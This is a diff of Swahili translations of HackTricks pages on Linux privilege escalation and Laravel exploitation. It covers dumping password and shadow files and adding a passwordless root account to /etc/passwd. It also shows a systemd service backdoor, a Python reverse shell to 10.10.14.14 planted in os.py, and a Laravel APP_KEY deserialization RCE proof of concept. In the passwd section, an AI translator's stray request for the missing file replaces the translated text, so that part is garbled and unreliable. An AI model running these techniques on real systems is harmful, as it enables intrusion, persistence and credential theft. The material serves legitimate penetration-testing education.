Kubuntu, etc) kati ya September 2006 na May 13th, 2008 vinaweza kuathiriwa na hitilafu hii.\ +Hitilafu hii hutokea wakati wa kuunda ssh key mpya katika OS hizo, kwani **mabadiliko 32,768 tu yalikuwa yanayowezekana**. Hii inamaanisha kwamba uwezekano wote unaweza kuhesabiwa na **ikiwa una ssh public key unaweza kutafuta private key inayolingana**. Unaweza kupata uwezekano uliokadiriwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) -### SSH Interesting configuration values +### SSH Vigezo vya konfigurasi vinavyovutia -- **PasswordAuthentication:** Inaeleza ikiwa uthibitisho kwa nywila unaruhusiwa. Chaguo-msingi ni `no`. -- **PubkeyAuthentication:** Inaeleza ikiwa uthibitisho kwa public key unaruhusiwa. Chaguo-msingi ni `yes`. -- **PermitEmptyPasswords**: Wakati uthibitisho kwa nywila unaporuhusiwa, inaeleza ikiwa server inaruhusu kuingia kwenye akaunti zenye nywila tupu. Chaguo-msingi ni `no`. +- **PasswordAuthentication:** Inaonyesha kama uthibitishaji kwa password unaruhusiwa. Chaguo-msingi ni `no`. +- **PubkeyAuthentication:** Inaonyesha kama uthibitishaji wa public key unaruhusiwa. Chaguo-msingi ni `yes`. +- **PermitEmptyPasswords**: Wakati uthibitishaji kwa password unaporuhusiwa, inaonyesha kama server inaruhusu kuingia kwenye akaunti zenye password tupu. Chaguo-msingi ni `no`. ### PermitRootLogin -Inaeleza kama root anaweza kuingia kwa kutumia ssh, chaguo-msingi ni `no`. Thamani zinazowezekana: +Inaelezea kama root anaweza kuingia kwa kutumia ssh, chaguo-msingi ni `no`. Thamani zinazowezekana: -- `yes`: root anaweza kuingia kwa kutumia nywila na private key -- `without-password` or `prohibit-password`: root anaweza kuingia kwa private key pekee -- `forced-commands-only`: Root anaweza kuingia kwa private key pekee na ikiwa chaguzi za amri (commands) zimetajwa +- `yes`: root anaweza kuingia akitumia password na private key +- `without-password` or `prohibit-password`: root anaweza kuingia tu kwa private key +- `forced-commands-only`: Root anaweza kuingia tu akitumia private key na ikiwa options za command zimeainishwa - `no` : hapana ### AuthorizedKeysFile -Inaainisha faili zinazohifadhi public keys ambazo zinaweza kutumika kwa uthibitisho wa mtumiaji. Inaweza kuwa na tokeni kama `%h`, ambazo zitabadilishwa na saraka ya home. **Unaweza kuonyesha absolute paths** (zinaanza na `/`) au **relative paths kutoka kwenye home ya mtumiaji**. Kwa mfano: +Inaelezea faili zinazobeba public keys zinazoweza kutumika kwa uthibitishaji wa mtumiaji. Inaweza kuwa na tokens kama `%h`, ambazo zitatengenezwa kwa saraka ya nyumbani. **Unaweza kutumia absolute paths** (zinazoanza na `/`) au **relative paths kutoka kwa home ya mtumiaji**. Kwa mfano: ```bash AuthorizedKeysFile .ssh/authorized_keys access ``` @@ -1189,91 +1210,98 @@ That configuration will indicate that if you try to login with the **private** k ### ForwardAgent/AllowAgentForwarding -SSH agent forwarding inakuruhusu **use your local SSH keys instead of leaving keys** (without passphrases!) zinazokaa kwenye server yako. Kwa hivyo, utaweza **jump** via ssh **to a host** na kutoka hapo **jump to another** host **using** the **key** iliyoko kwenye **initial host** yako. +SSH agent forwarding inakuwezesha **use your local SSH keys instead of leaving keys** (without passphrases!) kukaa kwenye server yako. Kwa hivyo, utaweza **jump** via ssh **to a host** na kutoka hapo **jump to another** host **using** the **key** iliyoko kwenye **initial host** yako. -Unaahitaji kuweka chaguo hili kwenye `$HOME/.ssh.config` kama ifuatavyo: +You need to set this option in `$HOME/.ssh.config` like this: ``` Host example.com ForwardAgent yes ``` -Kumbuka kwamba ikiwa `Host` ni `*`, kila wakati mtumiaji anapohama kwenda mashine tofauti, mwenyeji huyo atakuwa na uwezo wa kufikia funguo (ambayo ni tatizo la usalama). +Kumbuka kwamba ikiwa `Host` ni `*`, kila wakati mtumiaji anapohamia kwa mashine tofauti, host hiyo itakuwa na uwezo wa kupata keys (ambayo ni tatizo la usalama). -Faili `/etc/ssh_config` inaweza **kupindua** chaguzi hizi na kuruhusu au kukataa usanidi huu.\ Faili `/etc/sshd_config` inaweza **kuruhusu** au **kukanusha** ssh-agent forwarding kwa kutumia neno muhimu `AllowAgentForwarding` (chaguo-msingi ni kuruhusu). +Faili `/etc/ssh_config` inaweza **kuingilia kati** hizi **chaguzi** na kuruhusu au kukataa usanidi huu.\ +Faili `/etc/sshd_config` inaweza **kuruhusu** au **kukataa** ssh-agent forwarding kwa kigezo `AllowAgentForwarding` (chaguo-msingi ni kuruhusu). -Kama utagundua kwamba Forward Agent imewekwa katika mazingira, soma ukurasa ufuatao kwani **huenda ukaweza kuitumia vibaya kuongeza ruhusa**: +Ikiwa unagundua kuwa Forward Agent imewekwa katika mazingira, soma ukurasa ufuatao kwani **unaweza kuutumia vibaya ili kupandisha ruhusa**: {{#ref}} ssh-forward-agent-exploitation.md {{#endref}} -## Mafaili Muhimu +## Faili za Kuvutia -### Mafaili ya Profaili +### Faili za profile -Faili `/etc/profile` na mafaili yaliyopo chini ya `/etc/profile.d/` ni **scripts zinazotekelezwa wakati mtumiaji anapoendesha shell mpya**. Kwa hivyo, ikiwa unaweza **kuandika au kubadilisha yoyote kati yao unaweza kuongeza ruhusa**. +Faili `/etc/profile` na faili zilizo chini ya `/etc/profile.d/` ni **scripti zinazotekelezwa wakati mtumiaji anapoanzisha shell mpya**. Kwa hivyo, ikiwa unaweza **kuandika au kubadilisha yoyote yao unaweza kupandisha ruhusa**. ```bash ls -l /etc/profile /etc/profile.d/ ``` -Ikiwa script yoyote ya profile isiyo ya kawaida inapatikana, unapaswa kuikagua kwa ajili ya **maelezo nyeti**. +Ikiwa skripti ya profile isiyokuwa ya kawaida inapopatikana, unapaswa kuikagua kwa **maelezo nyeti**. -### Faili za Passwd/Shadow +### Passwd/Shadow Files -Kutegemea OS, faili za `/etc/passwd` na `/etc/shadow` zinaweza kuwa zinatumia jina tofauti au kunaweza kuwa na chelezo. Kwa hivyo inashauriwa **kutafuta zote** na **kukagua kama unaweza kusoma** ili kuona **ikiwa kuna hashes** ndani ya faili: +Kutegemea OS, faili za `/etc/passwd` na `/etc/shadow` zinaweza kuwa zikitumia jina tofauti au kuwa na nakala ya akiba. Kwa hivyo inashauriwa **kutafuta zote** na **kuangalia ikiwa unaweza kuzisoma** ili kuona **ikiwa kuna hashes** ndani ya faili hizo: ```bash #Passwd equivalent files cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null #Shadow equivalent files cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null ``` -Wakati mwingine unaweza kupata **password hashes** ndani ya faili ya `/etc/passwd` (au sawa). +Katika baadhi ya matukio unaweza kupata **password hashes** ndani ya faili ya `/etc/passwd` (au sawa). ```bash grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null ``` -### /etc/passwd inayoweza kuandikwa +### Inayoweza kuandikwa /etc/passwd -Kwanza, tengeneza password kwa kutumia moja ya maagizo yafuatayo. +Kwanza, tengeneza nenosiri kwa kutumia mojawapo ya amri zifuatazo. ``` openssl passwd -1 -salt hacker hacker mkpasswd -m SHA-512 hacker python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' ``` -Kisha ongeza mtumiaji `hacker` na ongeza nenosiri lililotengenezwa. +I don't have the README.md content. Please paste the exact markdown from src/linux-hardening/privilege-escalation/README.md that you want translated. + +Also confirm: +- Do you want me to append a new section that shows commands to add the user `hacker` and include a generated password, or insert it at a specific place? +- If you want a generated password now, specify length/character set (e.g., 16 chars, include symbols) or I can create a secure random one and include it. + +Once you provide the file content and confirm the password details, I'll return the translated markdown (English → Swahili) with the requested user/password addition, preserving all tags, links, paths and code blocks unchanged. ``` hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash ``` -Kwa mfano: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` +Mfano: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` -Sasa unaweza kutumia amri ya `su` ukitumia `hacker:hacker` +Sasa unaweza kutumia amri ya `su` na `hacker:hacker` -Vinginevyo, unaweza kutumia mistari ifuatayo kuongeza mtumiaji wa bandia bila nywila.\ -ONYO: unaweza kudhoofisha usalama wa sasa wa mashine. +Vinginevyo, unaweza kutumia mistari ifuatayo kuongeza mtumiaji wa bandia bila nenosiri.\ +TAHADHARI: huenda ukadhoofisha usalama wa sasa wa mashine. ``` echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` -Kumbuka: Katika majukwaa ya BSD `/etc/passwd` iko katika `/etc/pwd.db` na `/etc/master.passwd`, pia `/etc/shadow` limepewa jina jipya `/etc/spwd.db`. +Kumbuka: Katika majukwaa ya BSD `/etc/passwd` iko katika `/etc/pwd.db` na `/etc/master.passwd`, pia `/etc/shadow` imebadilishwa jina kuwa `/etc/spwd.db`. -Unapaswa kuangalia ikiwa unaweza **kuandika katika baadhi ya faili nyeti**. Kwa mfano, je, unaweza kuandika kwenye **faili ya usanidi ya huduma**? +Unapaswa kuangalia ikiwa unaweza **kuandika kwenye baadhi ya faili nyeti**. Kwa mfano, unaweza kuandika kwenye **service configuration file**? ```bash find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user ``` -Kwa mfano, ikiwa mashine inaendesha seva ya **tomcat** na unaweza **kuhariri faili ya usanidi ya huduma ya Tomcat ndani ya /etc/systemd/,** basi unaweza kubadilisha mistari: +Kwa mfano, ikiwa mashine inaendesha seva ya **tomcat** na unaweza **kubadilisha faili ya usanidi ya huduma ya Tomcat ndani ya /etc/systemd/,** basi unaweza kubadilisha mistari: ``` ExecStart=/path/to/backdoor User=root Group=root ``` -Backdoor yako itatekelezwa wakati tomcat itakapowashwa tena. +Backdoor yako itaendeshwa mara ijayo tomcat itakapozinduliwa. -### Angalia Folda +### Kagua Folda -Folda zifuatazo zinaweza kuwa na nakala za akiba au taarifa za kuvutia: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Huenda hautaweza kusoma ya mwisho, lakini jaribu) +Folda zifuatazo zinaweza kuwa na chelezo au taarifa za kuvutia: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Pengine hautaweza kusoma ile ya mwisho, lakini jaribu) ```bash ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root ``` -### Mahali Ajabu/Owned faili +### Eneo la Ajabu/Owned mafayela ```bash #root owned files in /home folders find /home -user root 2>/dev/null @@ -1290,19 +1318,19 @@ find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -pat done done ``` -### Faili zilizobadilishwa katika dakika chache zilizopita +### Faili zilizobadilishwa katika dakika za hivi karibuni ```bash find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null ``` -### Sqlite DB faili +### Mafaili ya Sqlite DB ```bash find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null ``` -### \*\_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml faili +### \*\_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml mafayela ```bash find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null ``` -### Mafaili yaliyofichwa +### Faili zilizofichwa ```bash find / -type f -iname ".*" -ls 2>/dev/null ``` @@ -1322,22 +1350,22 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null ```bash find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null ``` -### Faili zinazojulikana zenye passwords +### Faili zinazojulikana zenye nywila -Soma msimbo wa [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), inatafuta **faili kadhaa zinazoweza kuwa na passwords**.\ -**Chombo kingine cha kuvutia** ambacho unaweza kutumia ni: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) ambacho ni programu ya chanzo wazi inayotumika kupata passwords nyingi zilizohifadhiwa kwenye kompyuta ya ndani kwa Windows, Linux & Mac. +Soma msimbo wa [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), inatafuta **faili kadhaa zinazowezekana ambazo zinaweza kuwa na nywila**.\ +**Chombo kingine cha kuvutia** unachoweza kutumia kufanya hivyo ni: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) ambacho ni programu ya chanzo wazi inayotumika kupata nywila nyingi zilizohifadhiwa kwenye kompyuta ya ndani kwa Windows, Linux & Mac. ### Logs -Ikiwa unaweza kusoma logs, unaweza kupata **taarifa za kuvutia/za siri ndani yake**. Kadri log itakavyokuwa ya ajabu zaidi, ndivyo itakavyo kuwa ya kuvutia zaidi (labda).\ -Pia, baadhi ya "**mbaya**" configured (backdoored?) **audit logs** zinaweza kukuruhusu **kuandika passwords** ndani ya audit logs kama ilivyoelezwa kwenye chapisho hili: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). +Kama unaweza kusoma logs, unaweza kupata **taarifa za kuvutia/zinazo siri ndani yao**. Kama log ni ya kushangaza zaidi, ndivyo itakavyokuwa ya kuvutia zaidi (labda).\ +Pia, baadhi ya **mbaya** zilizosanikishwa vibaya (backdoored?) **audit logs** zinaweza kukuruhusu **kurekodi nywila** ndani ya audit logs kama ilivyoelezwa katika chapisho hiki: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). ```bash aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ``` -Ili **kusoma logs kikundi** [**adm**](interesting-groups-linux-pe/index.html#adm-group) kitakuwa msaada sana. +Ili **kusoma logi kikundi** [**adm**](interesting-groups-linux-pe/index.html#adm-group) kitakuwa msaada sana. -### Shell files +### Shell faili ```bash ~/.bash_profile # if it exists, read it once when you log in to the shell ~/.bash_login # if it exists, read it once if .bash_profile doesn't exist @@ -1350,41 +1378,41 @@ Ili **kusoma logs kikundi** [**adm**](interesting-groups-linux-pe/index.html#adm ``` ### Generic Creds Search/Regex -Unapaswa pia kuangalia faili zilizo na neno "**password**" katika **jina** lake au ndani ya **content**, na pia angalia IPs na emails ndani ya logs, au hashes regexps.\ -Sitaorodhesha hapa jinsi ya kufanya haya yote lakini ikiwa una nia unaweza kuangalia ukaguzi wa mwisho ambao [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) hufanya. +Unapaswa pia kuangalia faili zenye neno "**password**" katika **jina** au ndani ya **maudhui**, na pia angalia IPs na emails ndani ya logs, au regexps za hashes. +Sitasema hapa jinsi ya kufanya yote haya lakini ikiwa una nia unaweza kuangalia ukaguzi wa mwisho ambao [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) perform. ## Faili zinazoweza kuandikwa ### Python library hijacking -Ikiwa unajua **from where** script ya python itatekelezwa na unaweza **can write inside** folda hiyo au unaweza **modify python libraries**, unaweza kubadilisha OS library na kuiweka backdoor (ikiwa unaweza kuandika mahali script ya python itatekelezwa, copy and paste maktaba os.py). +Ikiwa unajua kutoka **wapi** script ya python itakayotekelezwa na unaweza **kuandika ndani** ya folda hiyo au unaweza **modify python libraries**, unaweza kubadilisha OS library na backdoor it (ikiwa unaweza kuandika mahali ambapo python script itakayotekelezwa, copy and paste maktaba ya os.py). -Ili **backdoor the library** ongeza tu mwishoni mwa os.py library mstari ufuatao (change IP and PORT): +To **backdoor the library** ongeza tu mwishoni mwa maktaba ya os.py mstari ufuatao (change IP and PORT): ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` ### Logrotate exploitation -Udhaifu katika `logrotate` unampa mtumiaji aliye na **write permissions** kwenye faili la log au kwenye direktorii zake za mzazi uwezekano wa kupata escalated privileges. Hii ni kwa sababu `logrotate`, mara nyingi ikiendeshwa kama **root**, inaweza kudhibitiwa ili kutekeleza faili yoyote, hasa katika direktorii kama _**/etc/bash_completion.d/**_. Ni muhimu kukagua ruhusa si tu kwenye _/var/log_ bali pia kwenye direktorii yoyote ambapo log rotation inatumika. +Udhaifu katika `logrotate` unamruhusu watumiaji wenye **idhini ya kuandika** kwenye faili ya logi au saraka zake za mzazi kupata uwezo wa kupandishwa wa privileges. Hii ni kwa sababu `logrotate`, mara nyingi ikikimbia kama **root**, inaweza kuchezwa ili kutekeleza faili yoyote, hasa katika saraka kama _**/etc/bash_completion.d/**_. Ni muhimu kukagua ruhusa si tu katika _/var/log_ bali pia katika saraka yoyote ambapo rotation ya logi inatumika. > [!TIP] -> Udhaifu huu unaathiri `logrotate` version `3.18.0` na zile za zamani +> Udhaifu huu unahusu `logrotate` toleo `3.18.0` na zile za zamani -Maelezo zaidi kuhusu udhaifu yanaweza kupatikana kwenye ukurasa huu: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). +Maelezo ya kina kuhusu udhaifu yanaweza kupatikana kwenye ukurasa huu: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). -Unaweza kutumia udhaifu huu kwa kutumia [**logrotten**](https://github.com/whotwagner/logrotten). +Unaweza kutumia udhaifu huu kwa [**logrotten**](https://github.com/whotwagner/logrotten). -Udhaifu huu unafanana sana na [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** hivyo kila unapogundua kwamba unaweza kubadilisha logs, angalia nani anasimamia logs hizo na uangalie kama unaweza escalate privileges kwa kubadilisha logs kuwa symlinks. +Udhaifu huu ni sawa sana na [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** hivyo kila utakapo gundua unaweza kubadilisha logs, angalia nani anayesimamia logs hizo na uhakiki kama unaweza kupandisha privileges kwa kubadilisha logs kwa symlinks. ### /etc/sysconfig/network-scripts/ (Centos/Redhat) **Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) -Ikiwa, kwa sababu yoyote, mtumiaji anaweza **write** script ya `ifcf-` hadi _/etc/sysconfig/network-scripts_ **or** anaweza **adjust** ile iliyopo, basi **system is pwned**. +Ikiwa, kwa sababu yoyote, mtumiaji anaweza **kuandika** script ya `ifcf-` kwenye _/etc/sysconfig/network-scripts_ **au** anaweza **kurekebisha** ile iliyopo, basi mfumo wako ume **pwned**. -Network scripts, _ifcg-eth0_ kwa mfano hutumika kwa muunganisho wa mtandao. Zinatoa muonekano sawa na faili za .INI. Hata hivyo, zinakuwa \~sourced\~ kwenye Linux na Network Manager (dispatcher.d). +Network scripts, kwa mfano _ifcg-eth0_, hutumiwa kwa muunganisho wa mtandao. Zinawoneka sawa kabisa na faili za .INI. Hata hivyo, zinakuwa \~sourced\~ kwenye Linux na Network Manager (dispatcher.d). -Katika kesi yangu, `NAME=` iliyowekwa katika network scripts hizi haiendeshwi kikamilifu. Ikiwa una nafasi nyeupe/tupu ndani ya jina mfumo unajaribu kutekeleza sehemu iliyofuata baada ya nafasi hiyo. Hii inamaanisha kwamba **everything after the first blank space is executed as root**. +Kwasema kwangu, thamani ya `NAME=` katika script hizi za mtandao haishughulikiwa ipasavyo. Ikiwa una nafasi nyeupe/blank katika jina, mfumo unajaribu kutekeleza sehemu iliyofuata baada ya nafasi hiyo. Hii inamaanisha kwamba **kila kitu baada ya nafasi ya kwanza kinatekelezwa kama root**. Kwa mfano: _/etc/sysconfig/network-scripts/ifcfg-1337_ ```bash @@ -1396,13 +1424,13 @@ DEVICE=eth0 ### **init, init.d, systemd, and rc.d** -The directory `/etc/init.d` ni nyumbani kwa **scripts** za System V init (SysVinit), **mfumo wa kawaida wa usimamizi wa huduma za Linux**. Inajumuisha scripts za `start`, `stop`, `restart`, na wakati mwingine `reload` huduma. Hizi zinaweza kuendeshwa moja kwa moja au kupitia symbolic links zilizopo katika `/etc/rc?.d/`. Njia mbadala kwenye mifumo ya Redhat ni `/etc/rc.d/init.d`. +The directory `/etc/init.d` is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`. An alternative path in Redhat systems is `/etc/rc.d/init.d`. -Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, mfumo mpya zaidi wa **service management** uliowasilishwa na Ubuntu, ukitumia faili za usanidi kwa kazi za usimamizi wa huduma. Licha ya mabadiliko kwenda Upstart, script za SysVinit bado zinatumika pamoja na usanidi wa Upstart kutokana na tabaka la utangamano ndani ya Upstart. +On the other hand, `/etc/init` is associated with **Upstart**, a newer **service management** introduced by Ubuntu, using configuration files for service management tasks. Despite the transition to Upstart, SysVinit scripts are still utilized alongside Upstart configurations due to a compatibility layer in Upstart. -**systemd** inatokea kama initializer na service manager ya kisasa, ikitoa vipengele vya juu kama kuanzisha daemons kwa mahitaji, usimamizi wa automount, na snapshots za hali ya mfumo. Inapanga faili katika `/usr/lib/systemd/` kwa packages za distribution na `/etc/systemd/system/` kwa marekebisho ya msimamizi, ikorahisisha mchakato wa utawala wa mfumo. +**systemd** emerges as a modern initialization and service manager, offering advanced features such as on-demand daemon starting, automount management, and system state snapshots. It organizes files into `/usr/lib/systemd/` for distribution packages and `/etc/systemd/system/` for administrator modifications, streamlining the system administration process. -## Other Tricks +## Mbinu Nyingine ### NFS Privilege escalation @@ -1411,7 +1439,7 @@ Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, mfumo mpya zaidi wa nfs-no_root_squash-misconfiguration-pe.md {{#endref}} -### Escaping from restricted Shells +### Kutoroka kutoka restricted Shells {{#ref}} @@ -1427,25 +1455,25 @@ cisco-vmanage.md ## Android rooting frameworks: manager-channel abuse -Android rooting frameworks kwa kawaida hu-hook syscall ili kufichua uwezo wa kernel wenye vibali kwa manager wa userspace. Uthibitishaji dhaifu wa manager (mfano, signature checks kutokana na FD-order au mipangilio duni ya nywila) unaweza kumruhusu app ya eneo la ndani kujifanya manager na kupandisha hadhi hadi root kwenye vifaa ambavyo tayari vime-root. Jifunze zaidi na maelezo ya exploit hapa: +Android rooting frameworks commonly hook a syscall to expose privileged kernel functionality to a userspace manager. Weak manager authentication (e.g., signature checks based on FD-order or poor password schemes) can enable a local app to impersonate the manager and escalate to root on already-rooted devices. Learn more and exploitation details here: {{#ref}} android-rooting-frameworks-manager-auth-bypass-syscall-hook.md {{#endref}} -## Kernel Security Protections +## Kinga za Usalama za Kernel - [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check) - [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) -## More help +## Msaada zaidi [Static impacket binaries](https://github.com/ropnop/impacket_static_binaries) ## Linux/Unix Privesc Tools -### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) +### **Chombo bora kutafuta Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) **LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t option)\ **Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\ @@ -1458,7 +1486,7 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md **EvilAbigail (physical access):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ **Recopilation of more scripts**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) -## References +## Marejeleo - [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/) @@ -1478,6 +1506,7 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md - [https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) - [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/) - [0xdf – HTB Eureka (bash arithmetic injection via logs, overall chain)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html) -- [GNU Bash Reference Manual – Shell Arithmetic](https://www.gnu.org/software/bash/manual/bash.html#Shell-Arithmetic) +- [GNU Bash Manual – BASH_ENV (non-interactive startup file)](https://www.gnu.org/software/bash/manual/bash.html#index-BASH_005fENV) +- [0xdf – HTB Environment (sudo env_keep BASH_ENV → root)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index 59b7dc3bb..c39cdb488 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -4,14 +4,14 @@ ### Laravel SQLInjection -Soma habari kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) +Soma taarifa kuhusu hili hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) --- -## APP_KEY & Msingi wa Uthibitishaji (Laravel \u003e=5.6) +## APP_KEY & Undani za Encryption (Laravel \u003e=5.6) -Laravel inatumia AES-256-CBC (au GCM) na HMAC uaminifu chini ya uso (`Illuminate\\Encryption\\Encrypter`). -Ciphertext ya raw ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha JSON** kama: +Laravel inatumia AES-256-CBC (au GCM) pamoja na HMAC kwa integriti chini ya kifuniko (`Illuminate\\Encryption\\Encrypter`). +Ciphertext mbichi ambayo hatimaye **hutumwa kwa client** ni **Base64 ya JSON object** kama: ```json { "iv" : "Base64(random 16-byte IV)", @@ -20,7 +20,7 @@ Ciphertext ya raw ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha "tag" : "" // only used for AEAD ciphers (GCM) } ``` -`encrypt($value, $serialize=true)` itafanya `serialize()` maandiko ya wazi kwa chaguo-msingi, wakati `decrypt($payload, $unserialize=true)` **itautumia kiotomatiki `unserialize()`** thamani iliyofichwa. Hivyo basi **mshambuliaji yeyote anayejua siri ya byte 32 `APP_KEY` anaweza kuunda kitu kilichofichwa cha PHP kilichosajiliwa na kupata RCE kupitia mbinu za kichawi (`__wakeup`, `__destruct`, …)**. +`encrypt($value, $serialize=true)` itafanya `serialize()` ya plaintext kwa default, wakati `decrypt($payload, $unserialize=true)` **ita `unserialize()` moja kwa moja** thamani iliyofichuliwa. Kwa hiyo **attacker yeyote anayejua siri ya 32-byte `APP_KEY` anaweza kutengeneza encrypted PHP serialized object na kupata RCE kupitia magic methods (`__wakeup`, `__destruct`, …)**. Minimal PoC (framework ≥9.x): ```php @@ -29,12 +29,12 @@ use Illuminate\Support\Facades\Crypt; $chain = base64_decode(''); // e.g. phpggc Laravel/RCE13 system id -b -f $evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste ``` -Ingiza mfuatano uliozalishwa kwenye chochote kilicho hatarini `decrypt()` sink (paramu ya njia, cookie, kikao, …). +Weka string iliyotengenezwa kwenye sink yoyote yenye udhaifu ya `decrypt()` (route param, cookie, session, …). --- ## laravel-crypto-killer 🧨 -[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inaweka mchakato mzima kuwa otomatiki na kuongeza hali rahisi ya **bruteforce**: +[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) huotomatisha mchakato mzima na inaongeza hali inayofaa ya **bruteforce**: ```bash # Encrypt a phpggc chain with a known APP_KEY laravel_crypto_killer.py 